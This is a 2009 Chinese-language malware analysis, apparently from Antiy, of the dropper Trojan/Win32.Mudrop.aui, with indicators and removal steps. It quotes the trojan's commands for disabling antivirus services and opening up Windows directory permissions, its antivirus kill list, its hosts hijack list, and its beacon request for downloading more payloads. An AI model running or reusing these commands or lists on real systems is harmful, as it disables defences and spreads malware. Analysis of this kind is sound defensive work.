Trojan/Win32. Mudrop.aui[Dropper]分析

发表于 2009-7-1 14:13

一、病毒标签：
病毒名称： Trojan/Win32. Mudrop.aui[Dropper]
病毒类型：木马
文件 MD5： 6CF94B87CBEABFA0CEC421F3E4827823
公开范围：完全公开
危害等级： 4
文件长度： 13,840 字节
感染系统： Windows98以上版本
开发工具： Microsoft Visual C++ 6.0
加壳类型： NsPacK V3.7

二、病毒描述：
该恶意代码文件为木马类，病毒运行后动获取大量API函数，创建病毒互斥量"907ERT"防止病毒多次运行产生冲突，遍历%System32%目录下是否存在"explorer.exe"文件，调用CMD命令将%Windir%、%Temp%目录给予当前用户完全控制权限，停止ekrn、AVP安全软件服务、结束大量安全软件进程，衍生病毒DLL文件到%System32%目录下，使用rundll32.exe启动病毒DLL文件，衍生病毒DLL到%Windir%目录下，动态获取病毒DLL的"FF"模块，进入该模块内后病毒判断自身进程是否在"explorer.exe"进程中，如是则创建hosts文件、劫持大量域名地址，调用API函数，查找含有windows 文件保护、找到恢复文件对话框的窗口，找到后将其窗口隐藏，在每个磁盘根目录下创建autorun.inf文件，添加注册表病毒服务创建病毒驱动文件，通过ipconfig all命令获取本机MAC地址连接网络发送安装统一信息，并下载大量病毒文件到本地。

三、行为分析：
本地行为:
1、病毒运行后动获取大量API函数，创建病毒互斥量"907ERT"防止病毒多次运行产生冲突，遍历%System32%目录下是否存在"explorer.exe"文件，调用CMD命令："cmd /c cacls C:\WINDOWS /e /p everyone:f"将%Windir%、%Temp%目录给予当前用户完全控制权限，使用："cmd /c sc config ekrn start= disabled"、cmd /c sc config avp start= disabled停止ekrn、AVP安全软件服务。

2、动态获取病毒DLL的"FF"模块，进入该模块内后病毒判断自身进程是否在"explorer.exe"进程中，如是则创建hosts文件、劫持大量域名地址，调用API函数，查找含有windows 文件保护、找到恢复文件对话框的窗口，找到后将其窗口隐藏，在每个磁盘根目录下创建autorun.inf文件，通过ipconfig all命令获取本机MAC地址连接网络发送安装统一信息，被劫持的hosts域名列表：
127.0.0.1    v.onondown.com.cn
127.0.0.2    ymsdasdw1.cn
127.0.0.3    h96b.info
127.0.0.0    fuck.zttwp.cn
127.0.0.0    www.hackerbf.cn
127.0.0.0    geekbyfeng.cn
127.0.0.0    121.14.101.68
127.0.0.0    ppp.etimes888.com
127.0.0.0    www.bypk.com
127.0.0.0    CSC3-2004-crl.verisign.com
127.0.0.1    va9sdhun23.cn
127.0.0.0    udp.hjob123.com
127.0.0.2    bnasnd83nd.cn
127.0.0.0    www.gamehacker.com.cn
127.0.0.0    gamehacker.com.cn
127.0.0.3    adlaji.cn
127.0.0.1    858656.com
127.1.1.1    bnasnd83nd.cn
127.0.0.1    my123.com
127.0.0.0    user1.12-27.net
127.0.0.1    8749.com
127.0.0.0    fengent.cn
127.0.0.1    4199.com
127.0.0.1    user1.16-22.net
127.0.0.1    7379.com
127.0.0.1    2be37c5f.3f6e2cc5f0b.com
127.0.0.1    7255.com
127.0.0.1    user1.23-12.net
127.0.0.1    3448.com
127.0.0.1    www.guccia.net
127.0.0.1    7939.com
127.0.0.1    a.o1o1o1.nEt
127.0.0.1    8009.com
127.0.0.1    user1.12-73.cn
127.0.0.1    piaoxue.com
127.0.0.1    3n8nlasd.cn
127.0.0.1    kzdh.com
127.0.0.0    www.sony888.cn
127.0.0.1    about.blank.la
127.0.0.0    user1.asp-33.cn
127.0.0.1    6781.com
127.0.0.0    www.netkwek.cn
127.0.0.1    7322.com
127.0.0.0    ymsdkad6.cn
127.0.0.1    localhost
127.0.0.0    www.lkwueir.cn
127.0.0.1    06.jacai.com
127.0.1.1    user1.23-17.net
127.0.0.1    1.jopenkk.com
127.0.0.0    upa.luzhiai.net
127.0.0.1    1.jopenqc.com
127.0.0.0    www.guccia.net
127.0.0.1    1.joppnqq.com
127.0.0.0    4m9mnlmi.cn
127.0.0.1    1.xqhgm.com
127.0.0.0    mm119mkssd.cn
127.0.0.1    100.332233.com
127.0.0.0    61.128.171.115:8080
127.0.0.1    121.11.90.79
127.0.0.0    www.1119111.com
127.0.0.1    121565.net
127.0.0.0    win.nihao69.cn
127.0.0.1    125.90.88.38
127.0.0.1    16888.6to23.com
127.0.0.1    2.joppnqq.com
127.0.0.0    puc.lianxiac.net
127.0.0.1    204.177.92.68
127.0.0.0    pud.lianxiac.net
127.0.0.1    210.74.145.236
127.0.0.0    210.76.0.133
127.0.0.1    219.129.239.220
127.0.0.0    61.166.32.2
127.0.0.1    219.153.40.221
127.0.0.0    218.92.186.27
127.0.0.1    219.153.46.27
127.0.0.0    www.fsfsfag.cn
127.0.0.1    219.153.52.123
127.0.0.0    ovo.ovovov.cn
127.0.0.1    221.195.42.71
127.0.0.0    dw.com.com
127.0.0.1    222.73.218.115
127.0.0.1    203.110.168.233:80
127.0.0.1    3.joppnqq.com
127.0.0.1    203.110.168.221:80
127.0.0.1    363xx.com
127.0.0.1    www1.ip10086.com.cm
127.0.0.1    4199.com
127.0.0.1    blog.ip10086.com.cn
127.0.0.1    43242.com
127.0.0.1    www.ccji68.cn
127.0.0.1    5.xqhgm.com
127.0.0.0    t.myblank.cn
127.0.0.1    520.mm5208.com
127.0.0.0    x.myblank.cn
127.0.0.1    59.34.131.54
127.0.0.1    210.51.45.5
127.0.0.1    59.34.198.228
127.0.0.1    www.ew1q.cn
127.0.0.1    59.34.198.88
127.0.0.1    59.34.198.97
127.0.0.1    60.190.114.101
127.0.0.1    60.190.218.34
127.0.0.0    qq-xing.com.cn
127.0.0.1    60.191.124.252
127.0.0.1    61.145.117.212
127.0.0.1    61.157.109.222
127.0.0.1    75.126.3.216
127.0.0.1    75.126.3.217
127.0.0.1    75.126.3.218
127.0.0.0    59.125.231.177:17777
127.0.0.1    75.126.3.220
127.0.0.1    75.126.3.221
127.0.0.1    75.126.3.222
127.0.0.1    772630.com
127.0.0.1    832823.cn
127.0.0.1    8749.com
127.0.0.1    888.jopenqc.com
127.0.0.1    89382.cn
127.0.0.1    8v8.biz
127.0.0.1    97725.com
127.0.0.1    9gg.biz
127.0.0.1    www.9000music.com
127.0.0.1    test.591jx.com
127.0.0.1    a.topxxxx.cn
127.0.0.1    picon.chinaren.com
127.0.0.1    www.5566.net
127.0.0.1    p.qqkx.com
127.0.0.1    news.netandtv.com
127.0.0.1    z.neter888.cn
127.0.0.1    b.myblank.cn
127.0.0.1    wvw.wokutu.com
127.0.0.1    unionch.qyule.com
127.0.0.1    www.qyule.com
127.0.0.1    it.itjc.cn
127.0.0.1    www.linkwww.com
127.0.0.1    vod.kaicn.com
127.0.0.1    www.tx8688.com
127.0.0.1    b.neter888.cn
127.0.0.1    promote.huanqiu.com
127.0.0.1    www.huanqiu.com
127.0.0.1    www.haokanla.com
127.0.0.1    play.unionsky.cn
127.0.0.1    www.52v.com
127.0.0.1    www.gghka.cn
127.0.0.1    icon.ajiang.net
127.0.0.1    new.ete.cn
127.0.0.1    www.stiae.cn
127.0.0.1    o.neter888.cn
127.0.0.1    comm.jinti.com
127.0.0.1    www.google-analytics.com
127.0.0.1    hz.mmstat.com
127.0.0.1    www.game175.cn
127.0.0.1    x.neter888.cn
127.0.0.1    z.neter888.cn
127.0.0.1    p.etimes888.com
127.0.0.1    hx.etimes888.com
127.0.0.1    abc.qqkx.com
127.0.0.1    dm.popdm.cn
127.0.0.1    www.yl9999.com
127.0.0.1    www.dajiadoushe.cn
127.0.0.1    v.onondown.com.cn
127.0.0.1    www.interoo.net
127.0.0.1    bally1.bally-bally.net
127.0.0.1    www.bao5605509.cn
127.0.0.1    www.rty456.cn
127.0.0.1    www.werqwer.cn
127.0.0.1    1.360-1.cn
127.0.0.1    user1.23-16.net
127.0.0.1    www.guccia.net
127.0.0.1    www.interoo.net
127.0.0.1    upa.netsool.net
127.0.0.1    js.users.51.la
127.0.0.1    vip2.51.la
127.0.0.1    web.51.la
127.0.0.1    qq.gong2008.com
127.0.0.1    2008tl.copyip.com
127.0.0.1    tla.laozihuolaile.cn
127.0.0.1    www.tx6868.cn
127.0.0.1    p001.tiloaiai.com
127.0.0.1    s1.tl8tl.com
127.0.0.1    s1.gong2008.com
127.0.0.1    4b3ce56f9g.3f6e2cc5f0b.com
127.0.0.1    2be37c5f.3f6e2cc5f0b.com

3、监视以下进程发现后将其进程强行关闭：
rsmain.exe、scanfrm.exe、rsnetsvr.exe、rssafety.exe、avp.exe、safeboxtray.exe、360safe.exe、360safebox.exe、360tray.exe、antiarp.exe、ekrn.exe、egui.exe、ravmon.exe、ravmond.exe、ravtask.exe、ccenter.exe、ravstub.exe、ravstub.exe、rstray.exe、rstray.exe、rav.exe、rav.exe、rsaupd.exe、rsaupd.exe、agentsvr.exe、agentsvr.exe、qqdoctor.exe、drrtp.exe、mcproxy.exe、mcnasvc.exe、mcshield.exe、mpfsrv.exe、pccguide.exe、zonealarm.exe、zonealarm.exe、wink.exe、windows优化大师.exe、wfindv32.exe、webtrap.exe、webscanx.exe、webscan.exe、vsstat.exe、vshwin32.exe、vshwin32.exe、vsecomr.exe、vpc32.exe、vir.exe、vettray.exe、vet95.exe、vavrunr.exe、ulibcfg.exe、tsc.exe、tmupdito.exe、tmproxy.exe、tmoagent.exe、tmntsrv.exe、tds2-ntexe、tds298.exe、tca.exe、tbscan.exe、sweep95.exe、spy.exe、sphinx.exe、smtpsvc.exe、smc.exe、sirc32.exe、serv95.exe、secu.exe、scrscan.exe、scon.exe、scanpm.exe、scan32.exe、scan.exe、safeweb.exe、scam32.exe、rfw.exe、rfwmain.exe、rfwsrv.exe、rfwstub.exe、rfwproxy.exe、rescue32.exe、rav7win.exe、rav7.exe、ras.exe、pview95.exe、prot.exe、program.exe、ppppwallrun.exe、pop3trap.exe、persfw.exe、pcfwallicon.exe、pccwin98.exe、pccmain.exe、pcciomon.exe、pccclient.exe、navwnt.exe、navw32.exe、navw.exe、navsched.exe、navrunr.exe、navnt.exe、navlu32.exe、navapw32.exe、navapsvc.exe、n32acan.exe、moolive.exe、moniker.exe、mon.exe、mcafee.exe、lucomserver.exe、luall.exe、kwatch.exe、kvprescan.exe、kvmonxp.exe、krf.exe、kppmain.exe、kpfwsvc.exe、kpfw32.exe、kpfw32.exe、kissvc.exe、kavstart.exe、kav32.exe、kasmain.exe、kabackreport.exe、jed.exe、cfinet32.exe、cfinet.exe、cfind.exe、cfiaudit.exe、avwin95.exe、avsynmgr.exe、avsched32.exe、avpupd.exe、avkserv.exe、autodown.exe、antivir.exe、anti-trojan.exe、dvp95exe、dv95o.exe、dv95.exe、kaccore.exe、kmailmon.exe、nod32krn.exe、efcv.exe、avp.exe

4、病毒运行后衍生以下文件到系统目录下
%System32%\drivers\etc\hosts
%System32%\drivers\OLD3.tmp
%System32%\drivers\pcidump.sys
%System32%\drivers\acpiec.sys
%System32%\dllcache\acpiec.sys
%System32%\func.dll
%Windir%\LastGood\system32\drivers\acpiec.sys
%Windir%\phpi.dll

5、添加病毒注册表服务启动项
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\DisplayName
值: 字符串: "pcidump"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\ImagePath
值: 字符串: "System32\DRIVERS\pcidump.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Start
值: DWORD: 3 (0x3)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump\Type
值: DWORD: 1 (0x1)

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\DisplayName
值: 字符串: "UPDATEDATA"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\ImagePath
值: 字符串: "\??\C:\WINDOWS\system32\drivers\acpiec.sys."
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\Start
值: DWORD: 3 (0x3)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA\Type
值: DWORD: 1 (0x1)

网络行为:
GET /360/aa1dfh.txt?mac=00-0C-29-8C-9D-B6&ver=v1-300&key=146&os=windows HTTP/1.1
User-Agent: INet
Host: babi2009.com
Cache-Control: no-cache
描述:向该域名提交安装统计信息，并按以下列表下载大量恶意病毒文件
HTTP/1.1 200 OK
Content-Length: 1320
Content-Type: text/plain
Last-Modified: Thu, 25 Jun 2009 06:48:33 GMT
Accept-Ranges: bytes
ETag: "cee827f560f5c91:2c0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 30 Jun 2009 07:12:10 GMT

2:http://havvvha***.com/xiao/aa1.exe
2:http://havvvha***.com/xiao/aa2.exe
2:http://havvvha***.com/xiao/aa3.exe
2:http://havvvha***.com/xiao/aa4.exe
1:http://havvvha***.com/xiao/aa5.exe
2:http://havvvha***.com/xiao/aa6.exe
2:http://havvvha***.com/xiao/aa7.exe
2:http://havvvha***.com/xiao/aa8.exe
2:http://havvvha***.com/xiao/aa9.exe
2:http://havvvha***.com/xiao/aa10.exe
2:http://havvvha***.com/xiao/aa11.exe
2:http://havvvha***.com/xiao/aa12.exe
2:http://havvvha***.com/xiao/aa13.exe
2:http://havvvha***.com/xiao/aa14.exe
2:http://havvvha***.com/xiao/aa15.exe
2:http://havvvha***.com/xiao/aa16.exe
2:http://havvvha***.com/xiao/aa17.exe
2:http://havvvha***.com/xiao/aa18.exe
2:http://havvvha***.com/xiao/aa19.exe
2:http://havvvha***.com/xiao/aa20.exe
2:http://havvvha***.com/xiao/aa21.exe
2:http://havvvha***.com/xiao/aa22.exe
2:http://havvvha***.com/xiao/aa23.exe
2:http://havvvha***.com/xiao/aa24.exe
2:http://havvvha***.com/xiao/aa25.exe
2:http://havvvha***.com/xiao/aa26.exe
2:http://havvvha***.com/xiao/aa27.exe
2:http://havvvha***.com/xiao/aa28.exe
2:http://havvvha***.com/xiao/aa29.exe
2:http://havvvha***.com/xiao/aa30.exe
2:http://havvvha***.com/xiao/aa31.exe
2:http://havvvha***.com/xiao/aa32.exe
2:http://havvvha***.com/xiao/aa33.exe
2:http://havvvha***.com/xiao/aa34.exe
2:http://havvvha***.com/xiao/aa35.exe
2:http://havvvha***.com/xiao/aa36.exe
2:http://havvvha***.com/xiao/1.exe

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
      %Windir% 　　　　　　　　　　  WINDODWS所在目录
　　　　%DriveLetter%　　　　　　　　逻辑驱动器根目录
　　　　%ProgramFiles%　　　　　　　  系统程序默认安装目录
　　　　%HomeDrive% 　　　　　　　　　当前启动的系统的所在分区
　　　　%Documents and Settings% 　　　当前用户文档根目录
　　　　%Temp% 　　　　　　　　　　　　\Documents and Settings
　　　　　　　　　　　　　　　　　　　  \当前用户\Local Settings\Temp
　　　　%System32% 　　　　　　　　　　系统的 System32文件夹
　　　　
　　　　Windows2000/NT中默认的安装路径是C:\Winnt\System32
　　　　windows95/98/me中默认的安装路径是C:\Windows\System
　　　　windowsXP中默认的安装路径是C:\Windows\System32　　　

四、清除方案：
1、使用安天防线可彻底清除此病毒(推荐)。
请到安天网站下载：http://www.antiy.com
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
（1）使用ATOOL“进程管理”关闭病毒相关进程，结束rundll32.exe
（2）删除病毒连接网络下载的大量病毒衍生的文件注：（病毒下载的列表内容会随时更换，所以衍生的文件也有可能变化）
%System32%\drivers\etc\hosts
%System32%\drivers\OLD3.tmp
%System32%\drivers\pcidump.sys
%System32%\drivers\acpiec.sys
%System32%\dllcache\acpiec.sys
%System32%\func.dll
%Windir%\LastGood\system32\drivers\acpiec.sys
%Windir%\phpi.dll
（3）删除病毒添加的注册表服务
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\pcidump
删除Services 键值下的pcidump主键值
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\UPDATEDATA
删除UPDATEDATA 键值下的pcidump主键值

		自动登录	找回密码
密码			注册创意安天

Trojan/Win32. Mudrop.aui[Dropper]分析

相关帖子